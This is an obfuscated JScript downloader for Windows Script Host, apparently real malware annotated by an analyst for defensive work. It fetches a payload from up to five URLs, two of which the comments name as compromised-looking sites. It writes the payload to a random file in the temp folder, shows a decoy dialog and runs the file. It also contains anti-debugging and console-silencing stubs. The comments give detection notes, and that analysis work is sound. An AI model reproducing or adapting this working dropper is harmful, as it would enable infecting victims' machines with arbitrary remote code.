- // to writeAndExecute(body, false); if every attempt fails (or something throws) it calls writeAndExecute(null, true).
- // The chain below makes at most five getDataFromUrl calls. Only two URLs are annotated by the paste author
- // (table keys $virXF and $vcJOZ); the ones passed directly as decoder('0x5a', ...), decoder('0x61', ...) and
- // decoder('0x65', ...) are not decoded on this page. Blocking only the two annotated hosts would leave the
- // remaining fallbacks reachable, so all five strings should be recovered when building indicators.
- // Before downloading, the function also runs two obfuscator-generated stubs (see the notes at each one).
- function getData(writeAndExecute) {
- // Lookup table of decoded strings and trivial wrappers; other code in this function reaches it by the
- // dotted names VkgRL, oCwsj, VSSET, LjYaf, ebaVd, sPKub and virXF.
- var _0x2a45ee = {};
- _0x2a45ee[decoder('0xf', '\x4f\x24\x43\x29')] = decoder('0x10', '\x53\x6a\x70\x6f');
- _0x2a45ee[decoder('0x11', '\x54\x78\x76\x49')] = decoder('0x12', '\x5b\x4c\x21\x64');
- _0x2a45ee[decoder('0x13', '\x5b\x4c\x21\x64')] = function (_0x501552, _0x29e47f) {
- return _0x501552 + _0x29e47f;
- };
- _0x2a45ee[decoder('0x14', '\x5b\x46\x39\x4d')] = function (_0x318188) {
- return _0x318188();
- };
- _0x2a45ee[decoder('0x15', '\x24\x70\x43\x53')] = function (_0x3dc7d5, _0x644010, _0x5000ce) {
- return _0x3dc7d5(_0x644010, _0x5000ce);
- };
- _0x2a45ee[decoder('0x16', '\x28\x79\x58\x43')] = decoder('0x17', '\x54\x78\x76\x49');
- _0x2a45ee[decoder('0x18', '\x54\x4f\x67\x7a')] = decoder('0x19', '\x24\x30\x50\x65');
- _0x2a45ee[decoder('0x1a', '\x26\x31\x56\x4b')] = function (_0x3f26a3, _0xf980df, _0x2c74ca) {
- return _0x3f26a3(_0xf980df, _0x2c74ca);
- };
- _0x2a45ee[decoder('0x1b', '\x40\x24\x47\x30')] = decoder('0x1c', '\x26\x47\x21\x63'); //$virXF = "http://608design.com/mainto/6Cgy/"
- _0x2a45ee[decoder('0x1d', '\x31\x5d\x41\x71')] = function (_0x1c04a1, _0x18b233, _0x57dfc4) {
- return _0x1c04a1(_0x18b233, _0x57dfc4);
- };
- _0x2a45ee[decoder('0x1e', '\x35\x54\x37\x4e')] = decoder('0x1f', '\x31\x73\x43\x57'); //$vcJOZ = "https://cssshk.com/wp-admin/gz56/"
- // Factory for a run-once wrapper: the first wrapper it hands out invokes the callback a single time
- // (the callback reference is nulled afterwards); every later wrapper is an empty function.
- var _0x46fd93 = function () {
- var _0x23499e = !![];
- return function (_0x5a4553, _0x2c9e1c) {
- var _0x4747c8 = _0x23499e ? function () {
- if (_0x2c9e1c) {
- var _0x14e2a4 = _0x2c9e1c[decoder('0x20', '\x64\x6f\x74\x73')](_0x5a4553, arguments);
- _0x2c9e1c = null;
- return _0x14e2a4;
- }
- } : function () {
- };
- _0x23499e = ![];
- return _0x4747c8;
- };
- }();
- // Stub 1: builds two regular expressions from decoded strings, tests them against the value returned by
- // _0x3e87a6(...) and then calls either that value or _0x3e87a6 itself.
- // NOTE(review): this has the shape of the anti-debugging ("debug protection") check that common JavaScript
- // obfuscators emit; it does not contribute to the download logic. Confirm against the decoded strings.
- (function () {
- var _0x35a3dc = {};
- _0x35a3dc[decoder('0x21', '\x24\x65\x70\x67')] = _0x2a45ee.VkgRL;
- _0x35a3dc[decoder('0x22', '\x38\x43\x5a\x49')] = _0x2a45ee.oCwsj;
- _0x35a3dc[decoder('0x23', '\x68\x24\x79\x78')] = function (_0x4c2f0c, _0x2f2cd7) {
- return _0x2a45ee.VSSET(_0x4c2f0c, _0x2f2cd7);
- };
- _0x35a3dc[decoder('0x24', '\x4c\x64\x6a\x4e')] = function (_0x999bb2, _0x46273e) {
- return _0x999bb2(_0x46273e);
- };
- _0x35a3dc[decoder('0x25', '\x4c\x64\x6a\x4e')] = function (_0x1c0ae3) {
- return _0x2a45ee.LjYaf(_0x1c0ae3);
- };
- _0x2a45ee[decoder('0x26', '\x4c\x64\x6a\x4e')](_0x46fd93, this, function () {
- var _0x5101d4 = new RegExp(_0x35a3dc[decoder('0x27', '\x4f\x68\x35\x34')]);
- var _0x2fa48c = new RegExp(decoder('0x28', '\x53\x6a\x70\x6f'), '\x69');
- var _0x3f085c = _0x3e87a6(decoder('0x29', '\x59\x25\x6e\x42'));
- if (!_0x5101d4[decoder('0x2a', '\x54\x78\x76\x49')](_0x3f085c + _0x35a3dc[decoder('0x2b', '\x5b\x4c\x21\x64')]) || !_0x2fa48c[decoder('0x2c', '\x34\x2a\x50\x41')](_0x35a3dc[decoder('0x2d', '\x56\x73\x6b\x54')](_0x3f085c, decoder('0x2e', '\x53\x6a\x70\x6f')))) {
- _0x35a3dc[decoder('0x2f', '\x4a\x5b\x55\x23')](_0x3f085c, '\x30');
- } else {
- _0x35a3dc[decoder('0x30', '\x63\x37\x6d\x2a')](_0x3e87a6);
- }
- })();
- }());
- // Second run-once wrapper factory, same construction as _0x46fd93 above.
- var _0x18f414 = function () {
- var _0x245b55 = !![];
- return function (_0x56080f, _0x18100a) {
- var _0x1e3225 = _0x245b55 ? function () {
- if (_0x18100a) {
- var _0x17bd68 = _0x18100a[decoder('0x31', '\x56\x73\x6b\x54')](_0x56080f, arguments);
- _0x18100a = null;
- return _0x17bd68;
- }
- } : function () {
- };
- _0x245b55 = ![];
- return _0x1e3225;
- };
- }();
- // Stub 2: control-flow-flattened block. The order in which the numbered cases run comes from a decoded
- // '|'-separated string, so the textual order below is not the execution order.
- // What the cases do: obtain the global object (case 2 defines the getter, case 0 calls it), define an empty
- // function (case 4), and assign that empty function to seven properties of one member of the global object,
- // creating the member first if it is missing (case 3).
- // NOTE(review): seven overwritten members on one global object matches the "disable console output" stub of
- // common JavaScript obfuscators; the member and property names are decoded at run time, so confirm.
- var _0x4e9df4 = _0x18f414(this, function () {
- var _0x1053de = _0x2a45ee[decoder('0x32', '\x53\x6a\x70\x6f')][decoder('0x33', '\x68\x26\x40\x48')]('\x7c'), _0x25e780 = 0x0;
- while (!![]) {
- switch (_0x1053de[_0x25e780++]) {
- case '\x30':
- var _0x31b100 = _0x2a45ee[decoder('0x34', '\x34\x2a\x50\x41')](_0x2c20cd);
- continue;
- case '\x31':
- var _0x5a5fcc = {};
- _0x5a5fcc[decoder('0x35', '\x21\x54\x45\x4b')] = function (_0x3faa15, _0x5620c5) {
- return _0x3faa15(_0x5620c5);
- };
- _0x5a5fcc[decoder('0x36', '\x56\x73\x6b\x54')] = function (_0x15f1a1, _0x5768e7) {
- return _0x2a45ee.VSSET(_0x15f1a1, _0x5768e7);
- };
- continue;
- case '\x32':
- var _0x2c20cd = function () {
- var _0x1e0e07;
- try {
- // Function(<two decoded strings> + ');')() : dynamic code built from decoded strings, falling back to window on failure.
- _0x1e0e07 = _0x5a5fcc[decoder('0x37', '\x56\x73\x6b\x54')](Function, _0x5a5fcc[decoder('0x38', '\x68\x6e\x50\x49')](_0x5a5fcc[decoder('0x39', '\x54\x78\x76\x49')](decoder('0x3a', '\x21\x54\x45\x4b'), decoder('0x3b', '\x68\x26\x40\x48')), '\x29\x3b'))();
- } catch (_0xc50881) {
- _0x1e0e07 = window;
- }
- return _0x1e0e07;
- };
- continue;
- case '\x33':
- if (!_0x31b100[decoder('0x3c', '\x68\x6e\x50\x49')]) {
- _0x31b100[decoder('0x3d', '\x53\x6a\x70\x6f')] = function (_0x3356a7) {
- var _0x309bd5 = {};
- _0x309bd5[decoder('0x3e', '\x56\x73\x6b\x54')] = _0x3356a7;
- _0x309bd5[decoder('0x3f', '\x71\x5d\x29\x4c')] = _0x3356a7;
- _0x309bd5[decoder('0x40', '\x26\x66\x41\x26')] = _0x3356a7;
- _0x309bd5[decoder('0x41', '\x76\x78\x38\x5b')] = _0x3356a7;
- _0x309bd5[decoder('0x42', '\x76\x78\x38\x5b')] = _0x3356a7;
- _0x309bd5[decoder('0x43', '\x53\x6a\x70\x6f')] = _0x3356a7;
- _0x309bd5[decoder('0x44', '\x34\x78\x50\x47')] = _0x3356a7;
- return _0x309bd5;
- }(_0x49c512);
- } else {
- var _0x1a516f = _0x2a45ee[decoder('0x45', '\x34\x78\x50\x47')][decoder('0x46', '\x68\x6e\x50\x49')]('\x7c'), _0x1fee24 = 0x0;
- while (!![]) {
- switch (_0x1a516f[_0x1fee24++]) {
- case '\x30':
- _0x31b100[decoder('0x47', '\x26\x47\x21\x63')][decoder('0x48', '\x40\x24\x47\x30')] = _0x49c512;
- continue;
- case '\x31':
- _0x31b100[decoder('0x49', '\x63\x37\x6d\x2a')][decoder('0x4a', '\x28\x79\x58\x43')] = _0x49c512;
- continue;
- case '\x32':
- _0x31b100[decoder('0x3d', '\x53\x6a\x70\x6f')][decoder('0x4b', '\x73\x67\x55\x62')] = _0x49c512;
- continue;
- case '\x33':
- _0x31b100[decoder('0x4c', '\x68\x26\x40\x48')][decoder('0x4d', '\x59\x25\x6e\x42')] = _0x49c512;
- continue;
- case '\x34':
- _0x31b100[decoder('0x3c', '\x68\x6e\x50\x49')][decoder('0x4e', '\x62\x4d\x52\x73')] = _0x49c512;
- continue;
- case '\x35':
- _0x31b100[decoder('0x4f', '\x6a\x29\x21\x34')][decoder('0x50', '\x5b\x46\x39\x4d')] = _0x49c512;
- continue;
- case '\x36':
- _0x31b100[decoder('0x51', '\x76\x4c\x28\x5a')][decoder('0x52', '\x31\x5d\x41\x71')] = _0x49c512;
- continue;
- }
- break;
- }
- }
- continue;
- case '\x34':
- var _0x49c512 = function () {
- };
- continue;
- }
- break;
- }
- });
- _0x4e9df4();
- // Download chain. Each callback receives (httpResponseBody, errorFlag) from getDataFromUrl; on success the
- // body goes straight to writeAndExecute, on error the next URL is tried from inside the callback.
- try {
- // Attempt 1: URL taken from the _0x2a45ee table.
- _0x2a45ee[decoder('0x53', '\x4e\x74\x4d\x5b')](getDataFromUrl, _0x2a45ee[decoder('0x54', '\x53\x6a\x70\x6f')], function (httpResponseBody, errorFlag) {
- var _0x185f68 = {};
- _0x185f68[decoder('0x55', '\x54\x6a\x6a\x34')] = function (_0x2a35f6, _0x3b43bf, _0x4266ed) {
- return _0x2a45ee.ebaVd(_0x2a35f6, _0x3b43bf, _0x4266ed);
- };
- _0x185f68[decoder('0x56', '\x5b\x46\x39\x4d')] = function (_0x4c990d, _0x39d7ab, _0x225650) {
- return _0x4c990d(_0x39d7ab, _0x225650);
- };
- _0x185f68[decoder('0x57', '\x34\x78\x50\x47')] = function (_0xef025d, _0x23bfc7, _0x3542ef) {
- return _0x2a45ee.sPKub(_0xef025d, _0x23bfc7, _0x3542ef);
- };
- // Copies the table entry the paste author annotated as $virXF; presumably the URL used by attempt 3 below.
- _0x185f68[decoder('0x58', '\x4e\x74\x4d\x5b')] = _0x2a45ee.virXF;
- if (!errorFlag) {
- return _0x2a45ee[decoder('0x59', '\x5b\x46\x39\x4d')](writeAndExecute, httpResponseBody, ![]);
- } else {
- // Attempt 2: URL decoded inline (hexArray index 0x5a), not annotated on this page.
- getDataFromUrl(decoder('0x5a', '\x26\x31\x56\x4b'), function (httpResponseBody, errorFlag) {
- if (!errorFlag) {
- return _0x185f68[decoder('0x5b', '\x24\x70\x43\x53')](writeAndExecute, httpResponseBody, ![]);
- } else {
- // Attempt 3: URL taken from the _0x185f68 table.
- getDataFromUrl(_0x185f68[decoder('0x5c', '\x35\x54\x37\x4e')], function (httpResponseBody, errorFlag) {
- var _0x3a4f74 = {};
- _0x3a4f74[decoder('0x5d', '\x31\x73\x43\x57')] = function (_0x9b93a3, _0x520330, _0xd2c4ef) {
- return _0x9b93a3(_0x520330, _0xd2c4ef);
- };
- _0x3a4f74[decoder('0x5e', '\x38\x43\x5a\x49')] = function (_0x54d8c7, _0x31b21a, _0x1f5b63) {
- return _0x185f68.FpLFt(_0x54d8c7, _0x31b21a, _0x1f5b63);
- };
- if (!errorFlag) {
- return _0x185f68[decoder('0x5f', '\x68\x24\x79\x78')](writeAndExecute, httpResponseBody, ![]);
- } else {
- // Attempt 4: URL decoded inline (hexArray index 0x61), not annotated on this page.
- _0x185f68[decoder('0x60', '\x34\x78\x50\x47')](getDataFromUrl, decoder('0x61', '\x28\x79\x58\x43'), function (httpResponseBody, errorFlag) {
- var _0x11ea16 = {};
- _0x11ea16[decoder('0x62', '\x34\x78\x50\x47')] = function (_0x417728, _0x556bab, _0x1d9296) {
- return _0x417728(_0x556bab, _0x1d9296);
- };
- if (!errorFlag) {
- return _0x3a4f74[decoder('0x63', '\x45\x6f\x6a\x76')](writeAndExecute, httpResponseBody, ![]);
- } else {
- // Attempt 5 (last): URL decoded inline (hexArray index 0x65), not annotated on this page.
- _0x3a4f74[decoder('0x64', '\x62\x4d\x52\x73')](getDataFromUrl, decoder('0x65', '\x5b\x4c\x21\x64'), function (httpResponseBody, errorFlag) {
- if (!errorFlag) {
- return _0x11ea16[decoder('0x66', '\x4f\x68\x35\x34')](writeAndExecute, httpResponseBody, ![]);
- } else {
- // Every URL failed: report the error to the caller.
- return _0x11ea16[decoder('0x67', '\x5b\x4c\x21\x64')](writeAndExecute, null, !![]);
- }
- });
- }
- });
- }
- });
- }
- });
- }
- });
- } catch (e) {
- return _0x2a45ee[decoder('0x68', '\x68\x24\x79\x78')](writeAndExecute, null, !![]);
- }
- }
- // Builds the path the downloaded payload will be written to: <folder> + '\' + <random fragment> + <decoded suffix>.
- // Returns the path string, or false if creating the COM object or any call throws.
- // NOTE(review): the paste author's variable names and the call shapes suggest Scripting.FileSystemObject with
- // GetSpecialFolder(2) (the temporary folder) and a Math.random().toString(36) fragment sliced with (2, 9);
- // the ProgID, method names and the file suffix are decoded at run time and not visible here, so confirm.
- // Detection note: if confirmed, the artefact to hunt for is a short, random base-36 file name created in the
- // user's temp directory by a script host process, not a fixed file name.
- function getTempFilePath() {
- // Lookup table: one decoded string (used below as the ProgID) and two string-concatenation wrappers.
- var _0x3bd4c9 = {};
- _0x3bd4c9[decoder('0x69', '\x26\x47\x21\x63')] = decoder('0x6a', '\x45\x6f\x6a\x76');
- _0x3bd4c9[decoder('0x6b', '\x6a\x29\x21\x34')] = function (_0x53e86b, _0x2c5ad8) {
- return _0x53e86b + _0x2c5ad8;
- };
- _0x3bd4c9[decoder('0x6c', '\x5b\x4c\x21\x64')] = function (_0x351e95, _0x526a24) {
- return _0x351e95 + _0x526a24;
- };
- try {
- var FSO = new ActiveXObject(_0x3bd4c9[decoder('0x6d', '\x2a\x6d\x78\x6e')]);
- // '\x5c' is a backslash; 0x24 is 36; the last decoder() call supplies the trailing part of the file name.
- var randomFileName = _0x3bd4c9[decoder('0x6e', '\x4c\x64\x6a\x4e')](_0x3bd4c9[decoder('0x6f', '\x71\x35\x67\x76')]('\x5c', Math[decoder('0x70', '\x6f\x70\x4e\x53')]()[decoder('0x71', '\x54\x78\x76\x49')](0x24)[decoder('0x72', '\x62\x4d\x52\x73')](0x2, 0x9)), decoder('0x73', '\x71\x5d\x29\x4c'));
- var FQFP = FSO[decoder('0x74', '\x26\x31\x56\x4b')](0x2) + randomFileName;
- return FQFP;
- } catch (e) {
- return ![];
- }
- }
- // Writes the downloaded body (_0x5f4192) to the path from getTempFilePath() and then calls
- // runExe(path, false); calls runExe(null, true) if no path could be built or if anything throws.
- // The body is written as received: nothing in this function inspects or validates it.
- // The write sequence is control-flow flattened: the execution order of the numbered cases comes from a
- // decoded '|'-separated string, so the textual order below is not the execution order.
- // NOTE(review): the operations (create object, set one property to 1 and another to 0, a call with the
- // payload, a call with (path, 2), two no-argument calls) match an ADODB.Stream used in binary mode with
- // SaveToFile(path, 2 = overwrite); the ProgID and member names are decoded at run time, so confirm.
- function saveToTemp(_0x5f4192, runExe) {
- // Lookup table: call wrappers plus one decoded string (used in case 3 as the ProgID).
- var _0x338c92 = {};
- _0x338c92[decoder('0x75', '\x6a\x29\x21\x34')] = function (_0x5a3de4) {
- return _0x5a3de4();
- };
- _0x338c92[decoder('0x76', '\x24\x30\x50\x65')] = decoder('0x77', '\x26\x47\x21\x63');
- _0x338c92[decoder('0x78', '\x24\x65\x70\x67')] = function (_0x107b3b, _0x37b2f5, _0x287715) {
- return _0x107b3b(_0x37b2f5, _0x287715);
- };
- _0x338c92[decoder('0x79', '\x4e\x2a\x6d\x32')] = function (_0x4610db, _0x1e7d38, _0x38f352) {
- return _0x4610db(_0x1e7d38, _0x38f352);
- };
- try {
- var tempPath = _0x338c92[decoder('0x7a', '\x26\x47\x21\x63')](getTempFilePath);
- // getTempFilePath() returns false on failure, which takes the else branch below.
- if (tempPath) {
- var _0x4719d2 = decoder('0x7b', '\x26\x66\x41\x26')[decoder('0x7c', '\x59\x25\x6e\x42')]('\x7c'), _0x427fda = 0x0;
- while (!![]) {
- switch (_0x4719d2[_0x427fda++]) {
- case '\x30':
- // Call that receives the downloaded body.
- newFileObject[decoder('0x7d', '\x62\x4d\x52\x73')](_0x5f4192);
- continue;
- case '\x31':
- newFileObject[decoder('0x7e', '\x4a\x5b\x55\x23')]();
- continue;
- case '\x32':
- newFileObject[decoder('0x7f', '\x73\x67\x55\x62')]();
- continue;
- case '\x33':
- var newFileObject = new ActiveXObject(_0x338c92[decoder('0x80', '\x63\x37\x6d\x2a')]);
- continue;
- case '\x34':
- // Call that receives the target path and the constant 2.
- newFileObject[decoder('0x81', '\x62\x4d\x52\x73')](tempPath, 0x2);
- continue;
- case '\x35':
- newFileObject[decoder('0x82', '\x4f\x68\x35\x34')] = 0x1;
- continue;
- case '\x36':
- newFileObject[decoder('0x83', '\x59\x25\x6e\x42')] = 0x0;
- continue;
- case '\x37':
- // Success: hand the written path to the caller's callback.
- return _0x338c92[decoder('0x84', '\x5b\x46\x39\x4d')](runExe, tempPath, ![]);
- }
- break;
- }
- } else {
- return _0x338c92[decoder('0x78', '\x24\x65\x70\x67')](runExe, null, !![]);
- }
- } catch (_0x21246b) {
- return _0x338c92[decoder('0x85', '\x24\x70\x43\x53')](runExe, null, !![]);
- }
- }
- // Entry point of the script: download (getData), then write to disk (saveToTemp), then launch the written file.
- // The callback first shows a dialog, and does so before hasError is checked, so the dialog appears whether
- // or not the download succeeded.
- // NOTE(review): the call shape WshShell[...](Text, 0, Title, 0x0 + 0x40) matches WScript.Shell Popup(text,
- // secondsToWait, title, type), where 0x40 selects the information icon; the text and title are decoded at
- // run time. This is presumably a decoy message for the user; confirm against the decoded strings.
- // Detection note: the dialog is a user-visible symptom, and the process chain to look for is a script host
- // that makes an HTTP request, writes a file under the temp folder and then starts that file.
- getData(function (bytes, hasError) {
- var _0x414874 = {};
- _0x414874[decoder('0x86', '\x5b\x74\x5e\x54')] = decoder('0x87', '\x24\x70\x43\x53');
- _0x414874[decoder('0x88', '\x5b\x4c\x21\x64')] = decoder('0x89', '\x24\x65\x70\x67');
- // WshShell, Text, Title and Res are assigned without var, so they become globals.
- WshShell = WScript[decoder('0x8a', '\x21\x54\x45\x4b')](decoder('0x8b', '\x24\x30\x50\x65'));
- Text = decoder('0x8c', '\x4f\x68\x35\x34');
- Title = _0x414874[decoder('0x8d', '\x6f\x70\x4e\x53')];
- Res = WshShell[decoder('0x8e', '\x33\x44\x43\x70')](Text, 0x0, Title, 0x0 + 0x40);
- if (!hasError) {
- saveToTemp(bytes, function (fileToRun, stopFlag) {
- if (!stopFlag) {
- try {
- // Creates a second COM object and passes it the written file's path; presumably WScript.Shell Run.
- var wsShell = new ActiveXObject(_0x414874[decoder('0x8f', '\x4f\x24\x43\x29')]);
- wsShell[decoder('0x90', '\x4c\x64\x6a\x4e')](fileToRun);
- } catch (e) {
- // Failures are swallowed: the script ends without any further visible error.
- }
- }
- });
- }
- });
- // Helper called only from the first stub inside getData(); it plays no part in downloading or writing the payload.
- // With a truthy argument it returns the inner function _0x3605c7; otherwise it calls _0x3605c7(0).
- // _0x3605c7 builds functions from decoded strings through a decoded member of a function object and invokes
- // them, then calls itself with an incremented counter without any stop condition, so the recursion only ends
- // when the engine throws; the surrounding try/catch swallows that error.
- // NOTE(review): this has the shape of the anti-debugging ("debug protection") routine that common JavaScript
- // obfuscators emit, which repeatedly triggers a debugger statement; the strings are decoded at run time, so confirm.
- // Analyst note: this is the reason to extract strings with the decoder alone and not step through the
- // whole script in a debugger.
- function _0x3e87a6(_0x3927ee) {
- // Lookup table of decoded strings plus wrappers for division, concatenation and a 1-argument call.
- var _0xa49e00 = {};
- _0xa49e00[decoder('0x91', '\x28\x79\x58\x43')] = decoder('0x92', '\x54\x6a\x6a\x34');
- _0xa49e00[decoder('0x93', '\x35\x54\x37\x4e')] = decoder('0x94', '\x4e\x2a\x6d\x32');
- _0xa49e00[decoder('0x95', '\x21\x54\x45\x4b')] = function (_0x3ff74f, _0x570ecb) {
- return _0x3ff74f / _0x570ecb;
- };
- _0xa49e00[decoder('0x96', '\x71\x5d\x29\x4c')] = decoder('0x97', '\x34\x2a\x50\x41');
- _0xa49e00[decoder('0x98', '\x63\x37\x6d\x2a')] = function (_0x30500c, _0x534308) {
- return _0x30500c + _0x534308;
- };
- _0xa49e00[decoder('0x99', '\x4e\x2a\x6d\x32')] = decoder('0x9a', '\x45\x6f\x6a\x76');
- _0xa49e00[decoder('0x9b', '\x63\x37\x6d\x2a')] = decoder('0x9c', '\x68\x26\x40\x48');
- _0xa49e00[decoder('0x9d', '\x34\x2a\x50\x41')] = function (_0x1aba01, _0x20458e) {
- return _0x1aba01(_0x20458e);
- };
- function _0x3605c7(_0x489ab9) {
- // Branch taken when typeof the argument equals a decoded type name (the caller in getData passes '0', a string).
- if (typeof _0x489ab9 === decoder('0x9e', '\x2a\x6d\x78\x6e')) {
- return function (_0x3a7fa3) {
- }[decoder('0x9f', '\x34\x78\x50\x47')](_0xa49e00[decoder('0xa0', '\x2a\x6d\x78\x6e')])[decoder('0xa1', '\x34\x2a\x50\x41')](_0xa49e00[decoder('0xa2', '\x54\x6a\x6a\x34')]);
- } else {
- // Numeric counter: both branches build and invoke a function from decoded strings; they differ only in the strings used.
- if (('' + _0xa49e00[decoder('0xa3', '\x28\x79\x58\x43')](_0x489ab9, _0x489ab9))[decoder('0xa4', '\x46\x4d\x5b\x40')] !== 0x1 || _0x489ab9 % 0x14 === 0x0) {
- (function () {
- return !![];
- }[decoder('0xa5', '\x34\x2a\x50\x41')](decoder('0xa6', '\x71\x35\x67\x76') + _0xa49e00[decoder('0xa7', '\x4f\x68\x35\x34')])[decoder('0xa8', '\x21\x54\x45\x4b')](decoder('0xa9', '\x28\x79\x58\x43')));
- } else {
- (function () {
- return ![];
- }[decoder('0xaa', '\x64\x6f\x74\x73')](_0xa49e00[decoder('0xab', '\x4e\x74\x4d\x5b')](_0xa49e00[decoder('0xac', '\x68\x6e\x50\x49')], decoder('0xad', '\x4f\x68\x35\x34')))[decoder('0xae', '\x2a\x6d\x78\x6e')](_0xa49e00[decoder('0xaf', '\x24\x65\x70\x67')]));
- }
- }
- // Unconditional self-call with the next counter value.
- _0x3605c7(++_0x489ab9);
- }
- try {
- if (_0x3927ee) {
- return _0x3605c7;
- } else {
- _0xa49e00[decoder('0xb0', '\x4a\x5b\x55\x23')](_0x3605c7, 0x0);
- }
- } catch (_0x45f4b4) {
- }
- }